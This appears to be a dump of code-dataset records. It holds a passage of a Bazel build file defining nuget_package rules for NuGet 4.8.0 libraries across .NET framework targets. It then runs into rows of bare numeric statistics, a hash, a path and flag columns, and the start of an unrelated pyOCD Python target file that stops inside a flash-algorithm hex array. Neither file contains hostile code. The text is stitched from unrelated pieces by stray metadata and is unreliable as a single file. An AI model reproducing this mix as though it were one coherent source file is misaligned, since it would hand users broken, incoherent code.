"net471": [
"@nuget.configuration//:net471_net",
"@nuget.packaging//:net471_net",
],
"net472": [
"@nuget.configuration//:net472_net",
"@nuget.packaging//:net472_net",
],
"netstandard1.6": [
"@nuget.configuration//:netstandard1.6_net",
"@nuget.packaging//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.configuration//:netstandard2.0_net",
"@nuget.packaging//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.configuration//:net46_net",
"@nuget.packaging//:net46_net",
],
"net461": [
"@nuget.configuration//:net461_net",
"@nuget.packaging//:net461_net",
],
"net462": [
"@nuget.configuration//:net462_net",
"@nuget.packaging//:net462_net",
],
"net47": [
"@nuget.configuration//:net47_net",
"@nuget.packaging//:net47_net",
],
"net471": [
"@nuget.configuration//:net471_net",
"@nuget.packaging//:net471_net",
],
"net472": [
"@nuget.configuration//:net472_net",
"@nuget.packaging//:net472_net",
],
"netstandard1.6": [
"@nuget.configuration//:netstandard1.6_net",
"@nuget.packaging//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.configuration//:netstandard2.0_net",
"@nuget.packaging//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.configuration//:mono",
"@nuget.packaging//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net461": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net462": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net47": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net471": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"net472": [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Protocol.dll",
"lib/netstandard1.6/NuGet.Protocol.xml",
],
},
mono_files = [
"lib/net46/NuGet.Protocol.dll",
"lib/net46/NuGet.Protocol.xml",
],
)
nuget_package(
name = "nuget.credentials",
package = "nuget.credentials",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Credentials.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Credentials.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Credentials.dll",
"net461": "lib/net46/NuGet.Credentials.dll",
"net462": "lib/net46/NuGet.Credentials.dll",
"net47": "lib/net46/NuGet.Credentials.dll",
"net471": "lib/net46/NuGet.Credentials.dll",
"net472": "lib/net46/NuGet.Credentials.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Credentials.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Credentials.dll",
},
mono_lib = "lib/net46/NuGet.Credentials.dll",
core_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.protocol//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Credentials.dll",
],
"net461": [
"lib/net46/NuGet.Credentials.dll",
],
"net462": [
"lib/net46/NuGet.Credentials.dll",
],
"net47": [
"lib/net46/NuGet.Credentials.dll",
],
"net471": [
"lib/net46/NuGet.Credentials.dll",
],
"net472": [
"lib/net46/NuGet.Credentials.dll",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Credentials.dll",
],
},
mono_files = [
"lib/net46/NuGet.Credentials.dll",
],
)
nuget_package(
name = "nuget.resolver",
package = "nuget.resolver",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Resolver.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Resolver.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Resolver.dll",
"net461": "lib/net46/NuGet.Resolver.dll",
"net462": "lib/net46/NuGet.Resolver.dll",
"net47": "lib/net46/NuGet.Resolver.dll",
"net471": "lib/net46/NuGet.Resolver.dll",
"net472": "lib/net46/NuGet.Resolver.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Resolver.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Resolver.dll",
},
mono_lib = "lib/net46/NuGet.Resolver.dll",
core_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.protocol//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.protocol//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net461": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net462": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net47": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net471": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"net472": [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Resolver.dll",
"lib/netstandard1.6/NuGet.Resolver.xml",
],
},
mono_files = [
"lib/net46/NuGet.Resolver.dll",
"lib/net46/NuGet.Resolver.xml",
],
)
nuget_package(
name = "nuget.librarymodel",
package = "nuget.librarymodel",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.LibraryModel.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.LibraryModel.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.LibraryModel.dll",
"net461": "lib/net46/NuGet.LibraryModel.dll",
"net462": "lib/net46/NuGet.LibraryModel.dll",
"net47": "lib/net46/NuGet.LibraryModel.dll",
"net471": "lib/net46/NuGet.LibraryModel.dll",
"net472": "lib/net46/NuGet.LibraryModel.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.LibraryModel.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.LibraryModel.dll",
},
mono_lib = "lib/net46/NuGet.LibraryModel.dll",
core_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.common//:mono",
"@nuget.versioning//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net461": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net462": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net47": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net471": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"net472": [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.LibraryModel.dll",
"lib/netstandard1.6/NuGet.LibraryModel.xml",
],
},
mono_files = [
"lib/net46/NuGet.LibraryModel.dll",
"lib/net46/NuGet.LibraryModel.xml",
],
)
nuget_package(
name = "nuget.dependencyresolver.core",
package = "nuget.dependencyresolver.core",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net461": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net462": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net47": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net471": "lib/net46/NuGet.DependencyResolver.Core.dll",
"net472": "lib/net46/NuGet.DependencyResolver.Core.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
},
mono_lib = "lib/net46/NuGet.DependencyResolver.Core.dll",
core_deps = {
"net46": [
"@nuget.librarymodel//:net46_net",
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.librarymodel//:net461_net",
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.librarymodel//:net462_net",
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.librarymodel//:net47_net",
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.librarymodel//:net471_net",
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.librarymodel//:net472_net",
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.librarymodel//:netstandard1.6_net",
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.librarymodel//:netstandard2.0_net",
"@nuget.protocol//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.librarymodel//:net46_net",
"@nuget.protocol//:net46_net",
],
"net461": [
"@nuget.librarymodel//:net461_net",
"@nuget.protocol//:net461_net",
],
"net462": [
"@nuget.librarymodel//:net462_net",
"@nuget.protocol//:net462_net",
],
"net47": [
"@nuget.librarymodel//:net47_net",
"@nuget.protocol//:net47_net",
],
"net471": [
"@nuget.librarymodel//:net471_net",
"@nuget.protocol//:net471_net",
],
"net472": [
"@nuget.librarymodel//:net472_net",
"@nuget.protocol//:net472_net",
],
"netstandard1.6": [
"@nuget.librarymodel//:netstandard1.6_net",
"@nuget.protocol//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.librarymodel//:netstandard2.0_net",
"@nuget.protocol//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.librarymodel//:mono",
"@nuget.protocol//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net461": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net462": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net47": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net471": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"net472": [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.DependencyResolver.Core.dll",
"lib/netstandard1.6/NuGet.DependencyResolver.Core.xml",
],
},
mono_files = [
"lib/net46/NuGet.DependencyResolver.Core.dll",
"lib/net46/NuGet.DependencyResolver.Core.xml",
],
)
nuget_package(
name = "nuget.projectmodel",
package = "nuget.projectmodel",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.ProjectModel.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.ProjectModel.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.ProjectModel.dll",
"net461": "lib/net46/NuGet.ProjectModel.dll",
"net462": "lib/net46/NuGet.ProjectModel.dll",
"net47": "lib/net46/NuGet.ProjectModel.dll",
"net471": "lib/net46/NuGet.ProjectModel.dll",
"net472": "lib/net46/NuGet.ProjectModel.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.ProjectModel.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.ProjectModel.dll",
},
mono_lib = "lib/net46/NuGet.ProjectModel.dll",
core_deps = {
"net46": [
"@nuget.dependencyresolver.core//:net46_net",
],
"net461": [
"@nuget.dependencyresolver.core//:net461_net",
],
"net462": [
"@nuget.dependencyresolver.core//:net462_net",
],
"net47": [
"@nuget.dependencyresolver.core//:net47_net",
],
"net471": [
"@nuget.dependencyresolver.core//:net471_net",
],
"net472": [
"@nuget.dependencyresolver.core//:net472_net",
],
"netstandard1.6": [
"@nuget.dependencyresolver.core//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.dependencyresolver.core//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.dependencyresolver.core//:net46_net",
],
"net461": [
"@nuget.dependencyresolver.core//:net461_net",
],
"net462": [
"@nuget.dependencyresolver.core//:net462_net",
],
"net47": [
"@nuget.dependencyresolver.core//:net47_net",
],
"net471": [
"@nuget.dependencyresolver.core//:net471_net",
],
"net472": [
"@nuget.dependencyresolver.core//:net472_net",
],
"netstandard1.6": [
"@nuget.dependencyresolver.core//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.dependencyresolver.core//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.dependencyresolver.core//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net461": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net462": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net47": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net471": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net472": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
},
mono_files = [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
)
nuget_package(
name = "nuget.commands",
package = "nuget.commands",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Commands.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Commands.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Commands.dll",
"net461": "lib/net46/NuGet.Commands.dll",
"net462": "lib/net46/NuGet.Commands.dll",
"net47": "lib/net46/NuGet.Commands.dll",
"net471": "lib/net46/NuGet.Commands.dll",
"net472": "lib/net46/NuGet.Commands.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Commands.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Commands.dll",
},
mono_lib = "lib/net46/NuGet.Commands.dll",
core_deps = {
"net46": [
"@nuget.credentials//:net46_net",
"@nuget.projectmodel//:net46_net",
],
"net461": [
"@nuget.credentials//:net461_net",
"@nuget.projectmodel//:net461_net",
],
"net462": [
"@nuget.credentials//:net462_net",
"@nuget.projectmodel//:net462_net",
],
"net47": [
"@nuget.credentials//:net47_net",
"@nuget.projectmodel//:net47_net",
],
"net471": [
"@nuget.credentials//:net471_net",
"@nuget.projectmodel//:net471_net",
],
"net472": [
"@nuget.credentials//:net472_net",
"@nuget.projectmodel//:net472_net",
],
"netstandard1.6": [
"@nuget.credentials//:netstandard1.6_net",
"@nuget.projectmodel//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.credentials//:netstandard2.0_net",
"@nuget.projectmodel//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.credentials//:net46_net",
"@nuget.projectmodel//:net46_net",
],
"net461": [
"@nuget.credentials//:net461_net",
"@nuget.projectmodel//:net461_net",
],
"net462": [
"@nuget.credentials//:net462_net",
"@nuget.projectmodel//:net462_net",
],
"net47": [
"@nuget.credentials//:net47_net",
"@nuget.projectmodel//:net47_net",
],
"net471": [
"@nuget.credentials//:net471_net",
"@nuget.projectmodel//:net471_net",
],
"net472": [
"@nuget.credentials//:net472_net",
"@nuget.projectmodel//:net472_net",
],
"netstandard1.6": [
"@nuget.credentials//:netstandard1.6_net",
"@nuget.projectmodel//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.credentials//:netstandard2.0_net",
"@nuget.projectmodel//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.credentials//:mono",
"@nuget.projectmodel//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net461": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net462": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net47": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net471": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net472": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
},
mono_files = [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
)
nuget_package(
name = "microsoft.web.xdt",
package = "microsoft.web.xdt",
version = "2.1.2",
net_lib = {
"net45": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net451": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net452": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net46": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net461": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net462": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net47": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net471": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net472": "lib/net40/Microsoft.Web.XmlTransform.dll",
},
mono_lib = "lib/net40/Microsoft.Web.XmlTransform.dll",
net_files = {
"net45": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net451": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net452": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net46": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net461": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net462": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net47": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net471": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net472": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
},
mono_files = [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
)
nuget_package(
name = "nuget.packagemanagement",
package = "nuget.packagemanagement",
version = "4.8.0",
net_lib = {
"net46": "lib/net46/NuGet.PackageManagement.dll",
"net461": "lib/net46/NuGet.PackageManagement.dll",
"net462": "lib/net46/NuGet.PackageManagement.dll",
"net47": "lib/net46/NuGet.PackageManagement.dll",
"net471": "lib/net46/NuGet.PackageManagement.dll",
"net472": "lib/net46/NuGet.PackageManagement.dll",
},
mono_lib = "lib/net46/NuGet.PackageManagement.dll",
net_deps = {
"net46": [
"@nuget.commands//:net46_net",
"@nuget.resolver//:net46_net",
"@microsoft.web.xdt//:net46_net",
],
"net461": [
"@nuget.commands//:net461_net",
"@nuget.resolver//:net461_net",
"@microsoft.web.xdt//:net461_net",
],
"net462": [
"@nuget.commands//:net462_net",
"@nuget.resolver//:net462_net",
"@microsoft.web.xdt//:net462_net",
],
"net47": [
"@nuget.commands//:net47_net",
"@nuget.resolver//:net47_net",
"@microsoft.web.xdt//:net47_net",
],
"net471": [
"@nuget.commands//:net471_net",
"@nuget.resolver//:net471_net",
"@microsoft.web.xdt//:net471_net",
],
"net472": [
"@nuget.commands//:net472_net",
"@nuget.resolver//:net472_net",
"@microsoft.web.xdt//:net472_net",
],
},
mono_deps = [
"@nuget.commands//:mono",
"@nuget.resolver//:mono",
"@microsoft.web.xdt//:mono",
],
net_files = {
"net46": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net461": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net462": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net47": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net471": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net472": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
},
mono_files = [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
)
| 37.642477
| 104
| 0.478453
| 6,624
| 77,807
| 5.505737
| 0.013889
| 0.085001
| 0.102303
| 0.087524
| 0.948231
| 0.923499
| 0.832822
| 0.796764
| 0.714176
| 0.683082
| 0
| 0.072692
| 0.371985
| 77,807
| 2,066
| 105
| 37.660697
| 0.673666
| 0.00126
| 0
| 0.76542
| 0
| 0
| 0.520385
| 0.451586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000486
| true
| 0
| 0
| 0
| 0.000486
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
60aef6c9bf088015bf2201a3e35454c7c14c23bd
| 9,622
|
py
|
Python
|
pyocd/target/builtin/target_M263KIAAE.py
|
vince-zeng/pyOCD
|
c9e7bbaee81c2c94b2d8f05a70b6f341457fdae1
|
[
"Apache-2.0"
] | 1
|
2022-03-25T01:07:23.000Z
|
2022-03-25T01:07:23.000Z
|
pyocd/target/builtin/target_M263KIAAE.py
|
vince-zeng/pyOCD
|
c9e7bbaee81c2c94b2d8f05a70b6f341457fdae1
|
[
"Apache-2.0"
] | null | null | null |
pyocd/target/builtin/target_M263KIAAE.py
|
vince-zeng/pyOCD
|
c9e7bbaee81c2c94b2d8f05a70b6f341457fdae1
|
[
"Apache-2.0"
] | 1
|
2021-06-10T08:34:00.000Z
|
2021-06-10T08:34:00.000Z
|
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...flash.flash import Flash
from ...core.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
# Flash programming algorithm for the 512 KiB APROM (application flash) bank.
# The 'instructions' array is position-independent Thumb machine code that the
# debugger loads into RAM at 'load_address'; the pc_* entries are the absolute
# addresses of its entry points within that RAM image.
FLASH_ALGO_AP_512 = {
    'load_address' : 0x20000000,
    # Flash algorithm machine code (Thumb), one 32-bit word per element.
    'instructions': [
    0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
    0xb087b5b0, 0x460c4613, 0x90054605, 0x92039104, 0x94019302, 0xe7ff9500, 0x6800481f, 0x42082101,
    0xe7ffd001, 0x481de7f8, 0x22406801, 0x60014311, 0x491b9805, 0x98046008, 0x6008491a, 0x28009803,
    0xe7ffd105, 0x43c02000, 0x60084917, 0x4816e003, 0x60014916, 0x4816e7ff, 0x60012101, 0x8f6ff3bf,
    0x480de7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480a, 0x42082140, 0xe7ffd008, 0x68014807,
    0x43112240, 0x20016001, 0xe0029006, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000,
    0x4000c00c, 0x4000c004, 0x4000c008, 0x0055aa03, 0x4000c010, 0xb087b5b0, 0x460c4613, 0x90054605,
    0x92039104, 0x2159481d, 0x21166001, 0x21886001, 0x68006001, 0x42082101, 0x94019302, 0xd1039500,
